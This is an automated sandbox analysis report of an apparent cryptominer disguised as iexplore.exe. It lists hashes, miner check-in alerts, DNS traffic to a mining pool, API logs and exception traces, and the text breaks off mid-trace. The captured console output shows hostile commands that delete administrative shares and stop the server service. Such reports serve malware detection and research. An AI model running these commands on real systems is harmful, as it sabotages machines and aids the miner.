Summary | ZeroBOX

iexplore.exe

Generic Malware, UPX, Antivirus, Malicious Library, Malicious Packer, PE64, OS Processor Check, PE32, PE File
Category: FILE
Machine: s1_win7_x6403_us
Started: June 5, 2023, 5:52 p.m.
Completed: June 5, 2023, 5:55 p.m.
Size: 3.9MB
Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5: a3d8b7059f0a4108d38144586fd63ee0
SHA256: fc82ae233202ce00335a22ad605fa184687db2023b8bdb8afbb4fd7cd61a8e52
CRC32: 2914A370
ssdeep: 98304:kVT8nSXdIs4DzUQeArdcHL9NlTxoUx2ZXOR6wwYIvtQZZuvIsGr:keSXdY/aAm9NRx28cfhvtPY
Yara
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

DNS

Name: x.f2pool.info
Response: 183.111.205.12
Post-Analysis Lookup:

Hosts

IP Address: 164.124.101.2
Status: Active
Action: Moloch

IP Address: 183.111.205.12
Status: Active
Action: Moloch

Suricata Alerts

Flow: TCP 192.168.56.103:49199 -> 183.111.205.12:1230
SID: 2024792
Signature: ET POLICY Cryptocurrency Miner Checkin
Category: Potential Corporate Privacy Violation

Flow: TCP 192.168.56.103:49199 -> 183.111.205.12:1230
SID: 2024792
Signature: ET POLICY Cryptocurrency Miner Checkin
Category: Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "d1lhots.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "rundlls.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: ERROR: The process "dl1hots.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The user name could not be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: More help is available by typing NET HELPMSG 2221.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The user name could not be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: More help is available by typing NET HELPMSG 2221.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The service name is invalid.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: More help is available by typing NET HELPMSG 2185.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The service name is invalid.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: More help is available by typing NET HELPMSG 2185.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: share iPC$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: share admin$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: share c$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: share d$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: share e$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: share f$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: stop lanmanserver /y
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Resource name: TEXTINCLUDE
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 41873596
registers.edi: 4642244
registers.eax: 41873596
registers.ebp: 41873676
registers.edx: 49
registers.ebx: 41873960
registers.esi: 2147746133
registers.ecx: 4416872
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73db6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73db6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73db27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73db2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73db253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73db2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73db25ab
wmic+0x39c80 @ 0x709c80
wmic+0x3b06a @ 0x70b06a
wmic+0x3b1f8 @ 0x70b1f8
wmic+0x36fcd @ 0x706fcd
wmic+0x3d6e9 @ 0x70d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 650112
registers.edi: 1974991376
registers.eax: 650112
registers.ebp: 650192
registers.edx: 1
registers.ebx: 4386188
registers.esi: 2147746133
registers.ecx: 2142574580
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 47640568
registers.edi: 4902276
registers.eax: 47640568
registers.ebp: 47640648
registers.edx: 49
registers.ebx: 47640932
registers.esi: 2147746133
registers.ecx: 4679056
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73d36f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73d36e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73d327a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73d32652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73d3253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73d32411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73d325ab
wmic+0x39c80 @ 0x7f9c80
wmic+0x3b06a @ 0x7fb06a
wmic+0x3b1f8 @ 0x7fb1f8
wmic+0x36fcd @ 0x7f6fcd
wmic+0x3d6e9 @ 0x7fd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1828416
registers.edi: 1974991376
registers.eax: 1828416
registers.ebp: 1828496
registers.edx: 1
registers.ebx: 4648380
registers.esi: 2147746133
registers.ecx: 2004483684
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 32634048
registers.edi: 3140820
registers.eax: 32634048
registers.ebp: 32634128
registers.edx: 49
registers.ebx: 32634412
registers.esi: 2147746133
registers.ecx: 2909584
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
